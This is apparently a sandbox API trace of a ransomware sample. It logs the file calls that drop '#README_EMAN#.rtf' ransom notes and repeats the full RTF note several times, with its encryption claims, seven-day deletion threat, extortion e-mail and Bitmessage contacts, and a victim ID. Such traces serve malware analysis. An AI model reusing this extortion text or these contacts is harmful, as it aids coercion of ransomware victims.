R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nU\x06/\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0289.304] WriteFile (in: hFile=0x2e8, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.305] CloseHandle (hObject=0x2e8) returned 1 [0289.305] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\#readme_eman#.rtf")) returned 0xffffffff [0289.305] GetLastError () returned 0x2 [0289.305] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\bg\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0289.308] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.308] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.308] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE 